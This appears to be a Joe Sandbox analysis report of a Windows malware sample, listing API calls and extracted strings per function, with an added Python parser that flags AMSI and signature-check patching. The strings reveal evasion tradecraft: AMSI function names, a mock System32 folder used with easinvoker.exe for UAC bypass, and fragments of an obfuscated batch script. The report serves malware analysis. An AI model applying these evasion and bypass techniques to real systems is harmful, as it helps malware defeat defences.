                                                                                        • Instruction ID: f4ae16c2b72f0d90a987651b397b3c057fa568fc8d5916a94cc6abc78e4cab5a
                                                                                        • Opcode Fuzzy Hash: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                        • Instruction Fuzzy Hash: A1F0E27260A3543EE221A1685C84EBFA29DCBC27A0F404A6DF55496380EB69CC04C3F2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
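The two routines above are the ones worth reading first in this listing: the routine at 02D7CA6C reaches CreateProcessAsUserW with AMSI export names (AmsiOpenSession, ScanString, UacScan) and a .bat path under C:\Users\Public\Libraries on its stack, and the routine at 02D77AC0 resolves BCryptVerifySignature via GetProcAddress and then calls NtWriteVirtualMemory on a foreign process handle (0x87C), a sequence consistent with patching that export in another process. Such call listings are easier to triage when parsed rather than eyeballed. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses lines in the report's own `• Api.Module(args), ref: ADDR` form (the sample lines are copied from this page) and flags three patterns: direct Nt*/Zw*/Rtl* calls, GetProcAddress of an export commonly patched to disable scanning or signature checks, and a memory write into another process after such a resolution. The patch-target export list and the pseudo-handle heuristic are assumptions for illustration. Note that the sandbox prints stack slots beyond an API's real parameter count, so only the leading arguments are trusted.

```python
import re
from dataclasses import dataclass

# Joe Sandbox renders each call as "• Api.Module(arg,arg,...), ref: ADDR"; calls
# reached through a callee are prefixed "Part of subcall function ADDR:".
_CALL_RE = re.compile(
    r"^(?P<sub>Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[^(]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)$"
)

# Constructed input: API-call lines copied from this report's function listings.
SAMPLE_LINES = r"""
  • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,02DC5644,02DC5688,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344), ref: 02D7CDD3
• LoadLibraryW.KERNEL32(bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize,02DC5360,02D79A30,00000870,02DC53DC,ScanString,02DC5360,02D79A30), ref: 02D77AD2
• GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D77ADF
• NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000087C,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize), ref: 02D77AF6
• FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize,02DC5360,02D79A30,00000870,02DC53DC), ref: 02D77B05
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D7C471
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D7C49E
"""

# Exports whose in-memory prologue is a common patch target for disabling script
# scanning, tracing or signature checks (assumption: a curated list, extend as needed).
PATCH_TARGETS = {"AmsiScanBuffer", "AmsiScanString", "AmsiOpenSession",
                 "AmsiInitialize", "BCryptVerifySignature", "EtwEventWrite"}
REMOTE_WRITERS = {"NtWriteVirtualMemory", "ZwWriteVirtualMemory", "WriteProcessMemory"}
# Handle values that do not denote another process (current-process pseudo handle,
# NULL, or a value the sandbox could not recover).
PSEUDO_HANDLES = {"FFFFFFFF", "00000000", "?"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str
    via_subcall: bool = False


def parse_api_lines(text):
    """Parse the APIs block of a Joe Sandbox function listing into ApiCall records.
    Lines that do not match the call form (headings, hashes, strings) are skipped."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = _CALL_RE.match(line)
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref"), m.group("sub") is not None))
    return calls


def triage(calls):
    """Return (kind, detail) findings for the calls, in listing order."""
    findings = []
    resolved = []  # patch-target exports resolved so far via GetProcAddress
    for c in calls:
        if c.api.startswith(("Nt", "Zw", "Rtl")):
            findings.append(("native_api", f"{c.api} @ {c.ref}"))
        if c.api == "GetProcAddress" and len(c.args) > 1 and c.args[1] in PATCH_TARGETS:
            resolved.append(c.args[1])
            findings.append(("resolves_patch_target", f"{c.args[1]} @ {c.ref}"))
        if c.api in REMOTE_WRITERS and c.args and c.args[0] not in PSEUDO_HANDLES:
            detail = f"{c.api} into process handle 0x{c.args[0]} @ {c.ref}"
            if resolved:  # a write after resolving a patch target: likely an in-memory patch
                findings.append(("remote_patch", detail + " after resolving " + ", ".join(resolved)))
            else:
                findings.append(("remote_write", detail))
        if c.api.startswith("CreateProcess"):
            findings.append(("process_launch", f"{c.api} @ {c.ref}"))
    return findings


if __name__ == "__main__":
    for kind, detail in triage(parse_api_lines(SAMPLE_LINES)):
        print(f"{kind:22} {detail}")
```

Run against the eight sample lines, the parser yields one record per call, and the triage reports `remote_patch` for the NtWriteVirtualMemory at 02D77AF6 because BCryptVerifySignature was resolved two calls earlier. The same parser can be pointed at the full report export to build a per-function behaviour summary.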

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02D77975
                                                                                        • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D7797B
                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D7799B
                                                                                        Strings
                                                                                        • C:\Windows\System32\ntdll.dll, xrefs: 02D77970
                                                                                        • NtAllocateVirtualMemory, xrefs: 02D7796B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                        • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                        • API String ID: 421316089-2206134580
                                                                                        • Opcode ID: d54ec32f136a03ce1ddf6ef2f4846a6a233c50e85c76b4f3fa4345f1c8f6a02f
                                                                                        • Instruction ID: adc3b80cbd31bde4d244a5d2f5379926d882fc79f7e8a342e4fc99d76c893ea6
                                                                                        • Opcode Fuzzy Hash: d54ec32f136a03ce1ddf6ef2f4846a6a233c50e85c76b4f3fa4345f1c8f6a02f
                                                                                        • Instruction Fuzzy Hash: E7E0E5B2640209BFEB00DEA8E845EEB77ACEB08610F404412BA09D7200E774ED108BB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02D77975
                                                                                        • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D7797B
                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D7799B
                                                                                        Strings
                                                                                        • C:\Windows\System32\ntdll.dll, xrefs: 02D77970
                                                                                        • NtAllocateVirtualMemory, xrefs: 02D7796B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                        • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                        • API String ID: 421316089-2206134580
                                                                                        • Opcode ID: 608cf7b03bf3f743939e1ec53dd90492b625869a64a9c0445bdf353ef5417d6a
                                                                                        • Instruction ID: 67cf424bb0e73d29cb49fd1b022b1d9a8766afcc8f160a9ed8a55f50dc2c6460
                                                                                        • Opcode Fuzzy Hash: 608cf7b03bf3f743939e1ec53dd90492b625869a64a9c0445bdf353ef5417d6a
                                                                                        • Instruction Fuzzy Hash: 31E01AB254020DBFEB00DEA8E845EDB77ACEB08610F404412BA09D7300E774ED108BF5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 02D64EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02D64EF2
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D7C5AC), ref: 02D7C517
                                                                                        • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02D7C5AC), ref: 02D7C547
                                                                                        • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02D7C55C
                                                                                        • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02D7C588
                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02D7C591
                                                                                          • Part of subcall function 02D64C24: SysFreeString.OLEAUT32(02D7D42C), ref: 02D64C32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 1897104825-0
                                                                                        • Opcode ID: 1615ad2738c753df73c1542e656a77de04b7cb8b46019d8efdd371f47540b714
                                                                                        • Instruction ID: e0bc1a77204fffc4be9780fa9ce87e45174f51d5263d1667663b2dda28a14790
                                                                                        • Opcode Fuzzy Hash: 1615ad2738c753df73c1542e656a77de04b7cb8b46019d8efdd371f47540b714
                                                                                        • Instruction Fuzzy Hash: 3F219575A50308BBEB11EA94CC56FEEB7BDEB08700F500466B600E72C0EA74AE458B65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D7C9EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CheckConnectionInternet
                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                        • API String ID: 3847983778-3852638603
                                                                                        • Opcode ID: 399747baea58aa9ad0b37fe602ca9dcdf76c7ee14275051cf908b447634213d5
                                                                                        • Instruction ID: 232f92507ccf48d2e0878abde7960b90dde944bb50f8554f8a97beba0425ead4
                                                                                        • Opcode Fuzzy Hash: 399747baea58aa9ad0b37fe602ca9dcdf76c7ee14275051cf908b447634213d5
                                                                                        • Instruction Fuzzy Hash: FB410031B642499FEB20EBA4D855EEEB3F6EF88715F604426E041B7350EA74AD058F60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 02D64EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02D64EF2
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D7C4CA), ref: 02D7C437
                                                                                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D7C471
                                                                                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D7C49E
                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D7C4A7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3764614163-0
                                                                                        • Opcode ID: d833fbb6e1e79520c1ccf49dabcab13dd4e971f5194df6a05d3b13d97bcfcb2a
                                                                                        • Instruction ID: 7a23c3f6621696bc6116e22a02645a374959414ef6f909142b700211b7daca42
                                                                                        • Opcode Fuzzy Hash: d833fbb6e1e79520c1ccf49dabcab13dd4e971f5194df6a05d3b13d97bcfcb2a
                                                                                        • Instruction Fuzzy Hash: F921B371A50208BFEB20DBA4DC46FEEB7BDEB04714F514466B604F72D0E6B46E048A64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 02D64EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02D64EF2
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D7C4CA), ref: 02D7C437
                                                                                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D7C471
                                                                                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D7C49E
                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D7C4A7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3764614163-0
                                                                                        • Opcode ID: e0340b50de51c17d32799b1bfddfb1d616d6d9859abb7fd4bfc74bf618f37741
                                                                                        • Instruction ID: 251377376822ad00012a5e0e72c25e79bc38f56aa910a6d731ce0cc7c1209f08
                                                                                        • Opcode Fuzzy Hash: e0340b50de51c17d32799b1bfddfb1d616d6d9859abb7fd4bfc74bf618f37741
                                                                                        • Instruction Fuzzy Hash: 0F21B371A50208BFEB20DB94DC46FEEB7BDEB04714F514466B604B72D0E6B46E048A64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 02D64EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02D64EF2
                                                                                        • RtlInitUnicodeString.N(?,?,00000000,02D7C3E2), ref: 02D7C390
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D7C3E2), ref: 02D7C3A6
                                                                                        • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D7C3E2), ref: 02D7C3C5
                                                                                          • Part of subcall function 02D64C24: SysFreeString.OLEAUT32(02D7D42C), ref: 02D64C32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                        • String ID:
                                                                                        • API String ID: 1694942484-0
                                                                                        • Opcode ID: 76c514489836fa29c099d27321d39258502a5dbd56c48bb4459f660f6b153d56
                                                                                        • Instruction ID: 9abb64f9f6860c55068cf6275eaedd775122c0835f7aadce8c5db03918573ff7
                                                                                        • Opcode Fuzzy Hash: 76c514489836fa29c099d27321d39258502a5dbd56c48bb4459f660f6b153d56
                                                                                        • Instruction Fuzzy Hash: 2801E175950208AFDB11EBA0CD41FDEB3EDEB48700F514462A641E6290EA74AF048B79
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 02D76D28: CLSIDFromProgID.OLE32(00000000,?,00000000,02D76D75,?,?,?,00000000), ref: 02D76D55
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,02D76E68,00000000,00000000,02D76DE7,?,00000000,02D76E57), ref: 02D76DD3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFromInstanceProg
                                                                                        • String ID:
                                                                                        • API String ID: 2151042543-0
                                                                                        • Opcode ID: 5f64dcad766a76666e42ca0d74a52eaa6778b81ced9369e9e704f1548c4595f1
                                                                                        • Instruction ID: f1861b61ccd9c8a9040c2ae7db5b1dda78f658c402cdac71fe75031dea4cd334
                                                                                        • Opcode Fuzzy Hash: 5f64dcad766a76666e42ca0d74a52eaa6778b81ced9369e9e704f1548c4595f1
                                                                                        • Instruction Fuzzy Hash: 1201B170214B04AFEB05DF61EC1286B7BADD749B10F914435F501D2740F678DD14C9B0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 02D77BE8: LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
                                                                                          • Part of subcall function 02D77BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
                                                                                          • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
                                                                                          • Part of subcall function 02D7C3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D7C4CA), ref: 02D7C437
                                                                                          • Part of subcall function 02D7C3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D7C471
                                                                                          • Part of subcall function 02D7C3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D7C49E
                                                                                          • Part of subcall function 02D7C3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D7C4A7
                                                                                          • Part of subcall function 02D67E18: GetFileAttributesA.KERNEL32(00000000,?,02D7E0EE,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanString,02DC5344,02D88FEC,UacScan,02DC5344,02D88FEC,UacInitialize), ref: 02D67E23
                                                                                        • Sleep.KERNEL32(00001770,UacScan,02DC5344,02D88FEC,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanBuffer,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC), ref: 02D83094
                                                                                          • Part of subcall function 02D7C368: RtlInitUnicodeString.N(?,?,00000000,02D7C3E2), ref: 02D7C390
                                                                                          • Part of subcall function 02D7C368: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D7C3E2), ref: 02D7C3A6
                                                                                          • Part of subcall function 02D7C368: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D7C3E2), ref: 02D7C3C5
                                                                                        • WinExec.KERNEL32(00000000,02D89524), ref: 02D8436D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FilePath$NameName_$AddressAttributesCloseCreateDeleteExecHandleInitLibraryLoadModuleProcSleepStringUnicodeWrite
                                                                                        • String ID: .url$@echo offset "Nnqr=set "%Nnqr%"njyC=="%Nnqr%"qkMvMLsfma%njyC%http"%Nnqr%"dbvWEsxWns%njyC%rem "%Nnqr%"NpzRZtRBVV%njyC%Cloa"%Nnqr%"ftNVZzSZxa%njyC%/Bat"%Nnqr%"TwupSEtIWD%njyC%gith"%Nnqr%"yIGacXULig%njyC%k"%Nnqr%"uGlGnqCSun%njyC%h2sh"%Nnqr%"FU$C:\Users\Public\$C:\Users\Public\alpha.exe$C:\Windows \System32\NETUTILS.dll$C:\Windows \System32\aaa.bat$C:\Windows \System32\easinvoker.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $HotKey=$IconIndex=$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$a.bat$er.e$s.d
                                                                                        • API String ID: 102611719-2667577771
                                                                                        • Opcode ID: 645c4068d8fc5ae514ef658b8e45e4bb9f6d17645dbd97ea75a5ed068c7d65ef
                                                                                        • Instruction ID: 82a2c178949a27a0657139d8ea807b5013532ec91813464b36a204da92ee6fa5
                                                                                        • Opcode Fuzzy Hash: 645c4068d8fc5ae514ef658b8e45e4bb9f6d17645dbd97ea75a5ed068c7d65ef
                                                                                        • Instruction Fuzzy Hash: 3053F235B5025A8BEB20FB64DC94EED73B6EB85300F5085A6E009E7354DE70AE85CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

APIs
  • Part of subcall function 02D77BE8: LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
  • Part of subcall function 02D77BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
  • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
  • Part of subcall function 02D7D318: RegOpenKeyA.ADVAPI32(?,00000000,02DC5798), ref: 02D7D35C
  • Part of subcall function 02D7D318: RegSetValueExA.ADVAPI32(00000870,00000000,00000000,00000001,00000000,0000001C,00000000,02D7D3C7), ref: 02D7D394
  • Part of subcall function 02D7D318: RegCloseKey.ADVAPI32(00000870,00000870,00000000,00000000,00000001,00000000,0000001C,00000000,02D7D3C7), ref: 02D7D39F
• WinExec.KERNEL32(00000000,00000000), ref: 02D857F9
  • Part of subcall function 02D79E70: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 02D79F33
• RtlMoveMemory.N(00000000,?,00000000,?,ScanBuffer,02DC5344,02D88FEC,UacScan,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC), ref: 02D85D7B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Yara matches
Similarity
• API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
• String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
• API String ID: 897696978-872072817
• Opcode ID: 070156a43ed0fb63c1ae43880aa9f874e9ebe50adc2f8e6b534214d104ae73dc
• Instruction ID: 1297ef599c94d7841e79edd466672fc31f541c3b41011b7a1b5ea23e176da9b8
• Opcode Fuzzy Hash: 070156a43ed0fb63c1ae43880aa9f874e9ebe50adc2f8e6b534214d104ae73dc
• Instruction Fuzzy Hash: 04921034A402998FDB24EBA4DC94EEDB3B7EB45300F5084E6E149E7354DA70AE85CF60
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• Sleep.KERNEL32(00000000,?,02D62000), ref: 02D617D0
• Sleep.KERNEL32(0000000A,00000000,?,02D62000), ref: 02D617E6
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 8c0a7f7c3ca38aa0c7cfb83081eb06eda664888dcbe859fd6b5682a16126888f
• Instruction ID: 6b91ca503e8ff5193dd33cc755d56b4d410187129f7c3e2651ca209729d24153
• Opcode Fuzzy Hash: 8c0a7f7c3ca38aa0c7cfb83081eb06eda664888dcbe859fd6b5682a16126888f
• Instruction Fuzzy Hash: 47B1C176A012528BC716CF68D4C8365BBE1EB85354F2886BAD85D8B3C5D770DC51CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02D77BA5,?,?,00000000,00000000), ref: 02D77B61
• GetProcAddress.KERNEL32(00000000,kernel32), ref: 02D77B67
• VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02D77BA5,?,?,00000000,00000000), ref: 02D77B81
Strings
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID: irtualProtect$kernel32
• API String ID: 2099061454-2063912171
• Opcode ID: 04b3f6742616da70cb997af93206fc9e90f63a4c7add2bc569feb1ef0c48088b
• Instruction ID: 187da9640340345cfc16698c6d37c01e915063d22758e7759b4b533c0a5b9431
• Opcode Fuzzy Hash: 04b3f6742616da70cb997af93206fc9e90f63a4c7add2bc569feb1ef0c48088b
• Instruction Fuzzy Hash: 47017C74640248BFE710EFA4EC55E6AB7EDEB48710FA14861F904E3740E674EE008A64
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
